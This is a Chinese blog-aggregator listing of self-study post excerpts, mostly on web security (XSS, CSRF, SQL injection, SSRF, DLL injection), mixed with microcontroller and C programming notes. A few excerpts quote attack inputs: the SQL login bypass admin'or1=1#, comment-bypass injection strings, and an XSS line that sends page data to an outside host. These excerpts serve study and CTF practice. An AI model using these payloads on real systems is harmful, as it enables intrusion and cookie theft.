web安全自学笔记

2021-11-03

1、十一月份看完《电子元器件》250页,花了差不多二十天,下一本为《STM32自学笔记》,看完硬件类的就要接触软件类的。
a灯火·2024-02-15 03:38

2022网络安全超详细路线图,零基础入门看这篇就够了

4.一辈子做信息安全吗这些不想清楚会对你以后的发展很不利,与其盲目的学习web安全,不如先做一个长远的计划。否则在我看来都是浪费时间。
技术宅不太宅·2024-02-14 17:04

(2022版)零基础入门网络安全/Web安全,收藏这一篇就够了

由于我之前写了不少网络安全技术相关的文章和回答,不少读者朋友知道我是从事网络安全相关的工作,于是经常有人私信问我:我刚入门网络安全,该怎么学?要学哪些东西?有哪些方向?怎么选?这一行职业前景如何?废话不多说,先上一张图镇楼,看看网络安全有哪些方向,它们之间有什么关系和区别,各自需要学习哪些东西。在这个圈子技术门类中,工作岗位主要有以下三个方向:安全研发安全研究:二进制方向安全研究:网络渗透方向下面
网络安全-无涯·2024-02-14 17:03

Web安全测试之XSS

XSS全称(CrossSiteScripting)跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript),当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.比如获取用户的Cookie,导航到恶意网站,携带木马等。作为测试人员,需要了解XSS的原理,攻击场景,如何修复。才能有效的防止XSS的发生。阅读目录XSS是如何发生的HTMLE
中科恒信·2024-02-14 14:35

c++自学笔记001-输入输出

#c++中的输入(cin)输出(cout)使用cin和cout是c++基于c上增加的标准输入输出流,cin由c和in组成,cout由c和out组成,望文知义。#include#includeusingnamespacestd;intmain(){inta,b,c;cout>a>>b>>c;cout>是插入运算符。4.endl含义endofline,与\n作用类似。
梁逸尘·2024-02-14 13:10

典型Web安全防护策略

Web安全问题的凸显致使得安全防护人员实施大量的安全机制来抵御攻击,尽管各种安全机制设计细节和执行效率可能千差万别,但几乎所有Web应用采用的安全机制在策略上都具有相似性,都离不开核心的几个基本原则和主要措施
爱看时事的通信崔·2024-02-14 01:23

视觉开发板—K210自学笔记(六)

视觉开发板—K210本期我们继续来遵循其他控制器的学习路线,在学习完GPIO的基本操作后,我们来学一个非常重要的UART串口通信。为什么说这个重要呢,通常来说我们在做一个稍微复杂的项目的时候K210作为主控的核心可能还有所欠缺,另外专业的事要给专业的人去干。也即是K210让它专心的去干它的视觉识别,系统的控制交给另外专业的控制器去完成。这两者之间可以通过串口通信来传递信息,作为一个主从的结构,K2
永远都是新手·2024-02-13 15:52

视觉开发板—K210自学笔记(五)

本期我们来遵循其他单片机的学习路线开始去用板子上的按键控制点亮LED。那么第一步还是先知道K210里面的硬件电路是怎么连接的,需要查看第二节的文档,看看开发板原理图到底是按键是跟哪个IO连在一起。然后再建立输入按键和GPIO的映射就可以开始变成了。硬件电路根据之前官方提供的assemblydrawing资料我们能知道了实际的LED位置,同样我们来找一下按键的位置。通过分析电路图我们可以看出实体按键
永远都是新手·2024-02-13 15:18

Web 应用安全发展的介绍

是安全的春天关于安全公司的甲方和乙方甲方:如腾讯、阿里等需要安全服务的公司乙方:提供安全服务、产品的服务型安全公司圈内熟知的安全公司:绿盟、知道创宇、安天、启明星辰、安恒、天融信Web与二进制Web,研究web
Wang's Blog·2024-02-13 06:05

前端必备的 web 安全知识手记

文章内容包括以下几个典型的web安全知识点:XSS、CSRF、点击劫持、SQL注入和上传问题等(下文以小王代指攻击者),话不多说,我们直接开车(附带的例子浅显易懂哦)。
就是不吃苦瓜·2024-02-13 05:13

[web安全]深入理解反射式dll注入技术

一、前言dll注入技术是让某个进程主动加载指定的dll的技术。恶意软件为了提高隐蔽性,通常会使用dll注入技术将自身的恶意代码以dll的形式注入高可信进程。常规的dll注入技术使用LoadLibraryA()函数来使被注入进程加载指定的dll。常规dll注入的方式一个致命的缺陷是需要恶意的dll以文件的形式存储在受害者主机上。这样使得常规dll注入技术在受害者主机上留下痕迹较大,很容易被edr等安
H_00c8·2024-02-13 03:09

风炫安全web安全学习第三十五节课 文件下载和文件读取漏洞

风炫安全web安全学习第三十五节课文件下载和文件读取漏洞0x03任意文件下载漏洞一些网站由于业务需求,往往需要提供文件下载功能,但若对用户下载的文件不做限制,则恶意用户就能够下载任意敏感文件,这就是文件下载漏洞
风炫安全·2024-02-12 19:16

Content Security Policy (CSP) 中的 frame-ancestors 'self' 指令介绍

ContentSecurityPolicy(CSP)是一种Web安全标准,旨在减少和防止网站上的一些特定类型的攻击,例如跨站脚本攻击(XSS)。
·2024-02-11 17:43

视觉开发板—K210自学笔记(三)

本期我们来遵循其他单片机的学习路线开始去做一位点灯大师—点亮一个LED。那么第一步还是先知道K210里面的硬件电路是怎么连接的,需要查看上一节的文档,看看开发板原理图到底是哪个LED跟哪个IO连在一起。一、硬件电路根据之前官方提供的assemblydrawing资料我们能看到实际的LED的位置,一共有四个LED,那么我们再来检查一下原理图里的这些灯到底是怎么连接的。DS1很明显没有连接任何IO,所
永远都是新手·2024-02-11 14:58

视觉开发板—K210自学笔记(四)

在点灯之后,我们就需要饿补一下相关的编程基础知识,了解基本语法,加深底蕴才能编写出更好的程序来。由于MaixPy是基于MicroPython之上进行开发构建的,提供给用户最终的接口是Micropython,所以在使用MaixPy开发之初我们需要熟悉下MicroPython的基础知识与语法一、关于MicroPython:MicroPython是编程语言Python3的精简高效实现,语法和Python
永远都是新手·2024-02-11 14:27

Web安全

正确思维方式的重要性,因此我告知好友:安全工程师的核心竞争力不在于他能拥有多少个0day,掌握多少种安全技术,而是在于他对安全理解的深度,以及由此引申的看待安全问题的角度和高度。我是如此想的,也是如此做的。
Towain·2024-02-11 09:42

【ARM自学笔记】ARM Cortex -A中断系统(原理篇)

文章目录前言简述中断向量表GIC架构中断IDGIC逻辑分块CP15协处理器中断使能中断优先级设置程序编写最后前言本文所描述的为Cortex-A7中断系统简述中断是什么?中断(Interrupt)是指处理器接收到来自硬件或软件的信号,提示发生了某个事件,应该被注意,这种情况就称为中断。通常,在接收到来自外围硬件(相对于中央处理器和内存)的异步信号,或来自软件的同步信号之后,处理器将会进行相应的硬件/
ORI2333·2024-02-10 18:42

白帽子讲web安全-跨站脚本攻击(2)

一XSS攻击进阶1XSS攻击平台攻击平台的主要目的就是为了演示xss的危害,以及方便测试使用,常见的有attackAPI,BeFF,XSS-Proxy2终极武器:XSSWorm(以往的蠕虫都是利用服务器端软件漏洞进行传播的)像有名的samyworm和百度空间蠕虫xssworm攻击是有一定条件的:一般来说,用户之间发生交互行为的页面,如果存在存储型XSS,则比较容易发起XSSworm攻击。3xss构
北邮小菜鸡·2024-02-10 12:18

红队系列-网络安全知识锦囊

网络安全免责声明法律科普学习资源网站靶场/CTF大佬博客笔记思维框图CTF/AWDAPT&&矩阵Web安全/渗透测试ToolsGolang工具FscanGolang工具ChYing信息收集注入攻击ToolsJNDIExploit
amingMM·2024-02-10 12:10

10、SpringSecurity自定义认证配置

A.声明配置类,定义用户名密码信息@Configuration@EnableWebSecurity//开启web安全设置生效publicclassSecurityConfigextendsWebSecurityConfigurerAdapter
敲代码的翠花·2024-02-10 09:59

视觉开发板—K210自学笔记(二)

视觉开发板—K210一、开发之前的准备工欲善其事必先利其器。各位同学先下载下面的手册:1.Sipeed-Maix-Bit资料下载:https://dl.sipeed.com/shareURL/MAIX/HDK/Sipeed-Maix-Bit/Maix-Bit_V2.0_with_MEMS_microphone2.Sipeed-Maix-Bit规格书下载:https://dl.sipeed.com/
永远都是新手·2024-02-10 07:52

运维技术分享:服务器管理需要注意的问题

一:安全的杂谈运维安全是企业安全保障的基石,不同于Web安全、移动安全或者业务安全,运维安全环节出现问题往往会比较严重。
云计算运维·2024-02-10 01:20

Spring MVC防御CSRF、XSS和SQL注入攻击

因为其实很多人做web开发,但涉及到web安全方面的都是比较资深的开发人员,很多人安全意识非常薄弱,CSRF是什么根本没有听说过。所以
Keith003·2024-02-09 10:07

CTF--Web安全--SQL注入之Post-Union注入

一、手动POST注入实现绕过账号密码检测我们利用sqli-labs/Less-11靶场来进行演示:我们可以看到一个登录页面打开Less-11的根目录,我们打开页面的源代码(PHP实现)。用VS-code打开文件,找到验证登录信息的代码行。此形式的代码存在POST注入漏洞。我们可以注入一句万能密码。admin'or1=1#单看这句代码可能不是很直观,我们将这句万能密码写到源代码中进行观察。@$sql
给我杯冰美式·2024-02-09 05:23

CTF--Web安全--SQL注入之报错注入

一、报错注入的概念用户使用数据库查询语句,向数据库发送错误指令,数据库返回报错信息,报错信息中参杂着我们想要获取的隐私数据。通常在我们在页面显示中找不到回显位的时候,使用报错注入。二、报错注入常见的三种形式1、extractvalue报错注入2、updatexml报错注入3、floor报错注入除以上三种,还有大量的报错注入形式,以上三种最为常见,其中floor报错注入较复杂。三、extractva
给我杯冰美式·2024-02-09 05:53

CTF-Web安全--SQL注入之Union注入详解

一、测试靶场与使用工具浏览器:火狐浏览器--Firefox靶场:sqli-labs使用插件:HackBar操作环境:phpstudy二、判断字符型注入与数字型注入操作步骤:1、用F12打开控制台,打开HackBar,LoarURL,将当前靶场的URL信息复制到操作台上2、输入?id=1,观察到页面发生变化,显示的是id=1时数据库中的信息,?是用来分割URL和查询字符串的,查询到了id=1时的用户
给我杯冰美式·2024-02-09 05:52

CTF--Web安全--SQL注入之‘绕过方法’

一、什么是绕过注入众所周知,SQL注入是利用源码中的漏洞进行注入的,但是有攻击手段,就会有防御手段。很多题目和网站会在源码中设置反SQL注入的机制。SQL注入中常用的命令,符号,甚至空格,会在反SQL机制中被实体化,从而失效,这时就要用到绕过的方法继续进行SQL注入。二、过滤注释符绕过1、反注入形式:SQL注入语句中,常见的注释符有三种:分别写作?id=1'--+/?id=1'#/?id=1'%2
给我杯冰美式·2024-02-09 05:50

汇编笔记 01

小蒟蒻的汇编自学笔记,如有错误,望不吝赐教文章目录笔记编辑器,启动!debug功能CS&IPmovaddsub汇编语言寄存器的英文全称中英对照表muldivandor笔记编辑器,启动!
tngyrn·2024-02-08 23:23

web安全学习

Day06--加密解密算法网站查询:cmd5.commd5:虽然说md5是不可逆,但是md5的解密实际上是枚举的算法(类似于在库中查找明文进行比对)时间戳:url编码:%+0-9或a-z组成的两位数。例如‘’的url编码是%20base64:0-9a-zA-Z组成,经常密文后面有一个或两个’=‘,区分大小写,长度随着明文的长度的增加而增加Unescape:%开始+u+四位的一个数字,与明文中两位相
lwwwa.·2024-02-08 22:43

kali系统搭建BlueLotus_XSSReceiver-master

1.访问GitHub-trysec/BlueLotus_XSSReceiver:XSS平台CTF工具Web安全工具下载BlueLotus_XSSReceiver-master2.我的kali系统已安装apache2
fengtianlei159·2024-02-08 07:41

【STL-set】set的使用 _STL自学笔记

前言啊啊啊,我还真是喜欢STL呢,明知道不能过度依赖它,但是就觉得好好用啊好方便啊怎么办……啃饼干啃STL,今天又啃了一个set。set是一个很棒的数据结构,度娘说:“STL对这个序列可以进行查找,插入删除序列中的任意一个元素,而完成这些操作的时间同这个序列中元素个数的对数成比例关系,并且当游标指向一个已删除的元素时,删除操作无效。而一个经过更正的和更加实际的定义应该是:一个集合(set)是一个容
糖果天王·2024-02-07 20:15

CTF之web安全

web安全CSRF简介CSRF,全名CrossSiteRequestForgery,跨站请求伪造。
不胜舟-·2024-02-07 18:43

Web安全基础:第4节:服务端请求伪造:SSRF漏洞-基础篇

1.SSRF简介SSRF(Server-SideRequestForgery,服务端请求伪造),是攻击者让服务端发起构造的指定请求链接造成的漏洞。由于存在防火墙的防护,导致攻击者无法直接入侵内网;这时攻击者可以以服务器为跳板发起一些网络请求,从而攻击内网的应用及获取内网数据。由于存在防火墙的防护,导致攻击者无法直接入侵内网;这时攻击者可以以服务器为跳板发起一些网络请求,从而攻击内网的应用及获取内网
花纵酒·2024-02-06 17:12

SSRF:服务端请求伪造攻击

服务端请求伪造(ServerSideRequestForgery):是最近几年出现的一种web漏洞,2021年,SSRF被OWASP列为Top10web安全风险之一其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功
未知百分百·2024-02-06 17:10

chapter09_保护Web应用_1_Spring Security简介

SpringAOP和Servlet中的Filter过滤Web请求(1)SpringSecurity借助一系列ServletFilter提供各种安全性功能(2)但是我们只需要配置一个Filter,当我们启用Web
米都都·2024-02-06 03:13

【STC51单片机自学笔记】——[中断系统]

1.微机的输入输出方式CPU与外设交换信息方式有以下几种:(1).程序控制方式(2).中断方式(3).直接存储器存取DMA方式(1)程序控制方式又分为:无条件传送、条件传送无条件传送主要针对简单外设进行简单操作。优点是程序不必检查外设的状态,就可以进行输入输出。缺点是CPU与外设工作不同步时,传输数据不可靠,仅适用于慢速设备。条件传送是CPU在传送数据之前,先执行一条输入命令,读取外设状态口中的内
Silencht·2024-02-05 20:34

(黑客)网络安全——自学

1.无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透2.也有Web防御技术(WAF)。
不会写代码的小彭·2024-02-05 17:43

风炫安全Web安全入门第一期课程总结

风炫安全Web安全入门第一期课程总结风炫安全Web安全入门第一期课程总结我们第一期的Web安全入门学习,已经基本完成了,这节课我们来最后做一下总结。
风炫安全·2024-02-05 14:12

零基础到精通Web渗透测试的学习路线

Web安全相关概念熟悉基本概念(SQL注入、上传、XSS、CSRF、一句话木马等)。
网安福宝·2024-02-05 00:34

Web安全

文章目录常见攻击方式XSSCSRFIDORSSRFSQLInjection命令执行文件包含文件上传点击劫持条件竞争XXEXSCH敏感信息泄露敏感信息泄露常见攻击方式XSS跨站脚本攻击,可以将代码注入到用户浏览的网页上,这种代码包括HTML和JavaScript攻击原理例如有一个论坛网站,攻击者可以在上面发布以下内容localtion.href="//domain.com/?c="+document
newcih·2024-02-04 18:05

[C语言]自学笔记day9(函数递归)

函数递归函数的递归类似于套娃通过在函数中调用这个函数的方式来产生递归例如求:一个数字的阶乘(10的阶乘为1*2*3*4*5*6*7*8*9*10)intfac(inta){if(a>1){returna*fac(a-1);}else{return1;}}intmain(){inta=0;scanf("%d",&a);printf("%d\n",fac(a));return0;}fac函数在fac函
Guilili_X·2024-02-04 13:02

Web安全—Web框架组成和各部分作用(持续更新)

Web框架组成和各部分作用:提要:了解Web框架的组成和作用有助于了解学习Web安全漏洞的原理和通信过程。
the zl·2024-02-04 09:29

《初学者C51自学笔记》之中断(外部中断0)

概念:CPU在处理某一事件A时,发生了另一事件B请求CPU迅速去处理(中断发生);CPU暂时中断当前的工作,转去处理事件B(中断响应和中断服务);待CPU将事件B处理完毕后,再回到原来事件A被中断的地方继续处理事件A(中断返回),这一过程称为中断。(P3.2)可由IT0(TCON.0)选择其为低电平有效还是下降沿有效。当CPU检测到P3.2引脚上出现有效的中断信号时,中断标志IE0(TCON.1)
KEEPMA·2024-02-04 04:55

《初学者C51自学笔记》之定时器四种工作方式(二)

1、方式0:方式0为13位计数,由TL0的低5位(高3位未用)和TH0的8位组成。TL0的低5位溢出时向TH0进位,TH0溢出时,置位TCON中的TF0标志,向CPU发出中断请求。一共13位,空着的3位忽略不用管,TL0一直加1,直到为11111时再加1会溢出变为00000,则会进1到TH0,就像是满10进1一样,进到TH0为11111111时再加1就会发出请求;X=-N:N是要定时的时间(us)
KEEPMA·2024-02-04 04:55

《初学者C51自学笔记》之流水灯实现(移位操作)

#include#defineucharunsignedchar#defineuintunsignedintvoiddelay(void){uchara,b;for(a=0;a<200;a++)for(b=0;b<200;b++);}voidmain(){uchark,i;while(1){k=0xfe;//11111110for(i=0;i<8;i++){P0=k;delay();k=k<<1;
KEEPMA·2024-02-04 04:25

风炫安全WEB安全学习第二十一节课 存储型XSS讲解

风炫安全WEB安全学习第二十一节课存储型XSS讲解存储型XSS演示存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中
风炫安全·2024-02-04 03:18

【靶场实战】Pikachu靶场敏感信息泄露关卡详解

Nx01系统介绍Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。
晚风不及你ღ·2024-02-04 02:40

一、cadence PDK 自学笔记-心法

我这边ADS/CadencePDK基本大部分都是自学完成的。当然也非常感谢我的前同事周**的帮忙,教了我很多基础的。另外也感谢我现在同事,李**和程*的帮忙,学习了很多cad的视角。其实对于自学写PDK的小伙伴,一般都要如何学习呢?我总结了我几次完成的学习流程:(以cadencePDK为例)首先,自学最重要的是一个成就感的搭建,所以需要先确定以PCell为起点去编写结构。并且,需要了解一下,pdk
yesoili·2024-02-03 21:51

[网络安全学习篇附]:Web 安全学习路线

TableofContentsWeb安全学习路线熟悉Windows/kaliLinux系统服务器安全配置脚本编程学习熟悉Web相关的概念熟悉渗透相关的工具渗透实战操作关注安全圈动态源码审计与漏洞分析安全体系设计与开发
白面安全猿·2024-02-03 19:38

Web安全2.3:CSP安全策略、Cookie、Session、同源策略、HTML DOM树

文章目录Web安全2.3:CSP安全策略、Cookie、Session、同源策略、HTMLDOM树一、CSP安全策略:1、CSP的部分命令:2、策略控制:(1)首先我们先把meta标签注释掉,如下:(2
Slash · Young·2024-02-03 09:51
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他